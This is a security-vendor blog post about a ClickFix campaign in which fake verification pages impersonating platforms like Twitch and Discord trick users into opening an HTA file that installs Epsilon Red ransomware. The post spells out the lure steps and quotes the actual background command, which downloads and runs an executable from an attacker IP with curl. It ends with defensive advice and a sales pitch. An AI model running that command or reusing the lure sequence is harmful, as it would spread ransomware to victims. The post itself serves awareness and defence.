New ClickFix Campaign Uses HTA Files to Spread Epsilon Red Ransomware

Cybercriminals are disguising ransomware attacks as harmless verification steps using fake websites that mimic trusted platforms. Learn how the threat works and what you can do to stay protected.

“What Makes This New Campaign So Dangerous?”

A newly discovered ransomware campaign is using an updated twist on the ClickFix social engineering method, which tricks users into downloading HTML Application (HTA) files. The result? Installation of Epsilon Red ransomware and widespread system compromise. Historically, the ClickFix technique deceives users into taking an action to “fix” a non-existent issue by copying and pasting a malicious command into their terminal or Run dialog. Pop-ups are shown with dialog requiring the user to press on buttons like “Fix It” or “I am not a robot,” as just a couple of examples observed.

Researchers at CloudSEK’s TRIAD team uncovered the campaign where hackers set up fake verification portals, mimicking well-known brands such as Twitch, Discord’s Captcha Bot, OnlyFans, Kick, and Rumble. These spoofed websites prompt users to complete what appears to be an “extra verification step” for access, prompting the user to save and open a seemingly innocuous file.

But that file isn’t harmless; It’s a .hta file that, once executed, runs JavaScript leveraging legacy features like ActiveXObject and WScript.Shell to download and launch a ransomware attack. The site even displays a fake verification code to create a false sense of legitimacy after the malware is already running.

“How Does the Attack Actually Work?”

Rather than using traditional copy-paste command prompts like earlier ClickFix schemes, this version ups the ante:

1. Users are prompted to press CTRL+S to download a file

2. They are instructed to rename it to verify.hta

3. Victims are told to open it using Microsoft HTML Application Host (mshta.exe)

4. A fake popup appears, and they are guided to enter a “verification code”

Unbeknownst to them, this sequence triggers a background command:

cmd /c cd /D %userprofile% && curl -s -o a.exe http://155.94.155[.]227:2269/dw/vir.exe && a.exe

This command uses the curl command-line tool to download and execute Epsilon Red ransomware.

“What Is Epsilon Red and Why Should I Be Concerned?”

Epsilon Red is a ransomware strain first identified in 2021. While its ransom note design mimics REvil, its technical infrastructure and behavior are unique. It uses double extortion tactics, encrypting files and threatening to leak stolen data unless a ransom is paid.

This latest campaign demonstrates a more polished and deceptive infection vector, increasing the likelihood of successful attacks on unsuspecting users. The use of ActiveX and WScript.Shell also allows the malware to bypass modern web protections by exploiting legacy Windows components.

“What Can I Do to Protect My Systems and Team?”

Here are three key ways to defend against this evolving threat:

1. Block Legacy Scripting Technologies – Disable ActiveXObject and WScript.Shell via Group Policy or endpoint configurations. These features are rarely needed and commonly abused by threat actors.

2. Implement EDR Rules and Threat Feeds – Use Endpoint Detection and Response (EDR) tools to flag suspicious child processes created by browsers, and ingest threat intelligence feeds to block known Epsilon Red IPs and domains.

3. Educate Your Workforce – Raise employee awareness of social engineering tricks, fake verification sites, and brand impersonation. Awareness training should highlight the risks of downloading and running unexpected files.

Need support building a layered defense plan? Let’s talk about our Vulnerability Assessment, Cybersecurity Policy & Controls (focusing on Business Continuity Planning), and training your team with our Phishing Simulations and Awareness Training. By planning ahead, we can help you keep doing what you do best. Don’t let deception compromise your business.

Follow us - stay ahead.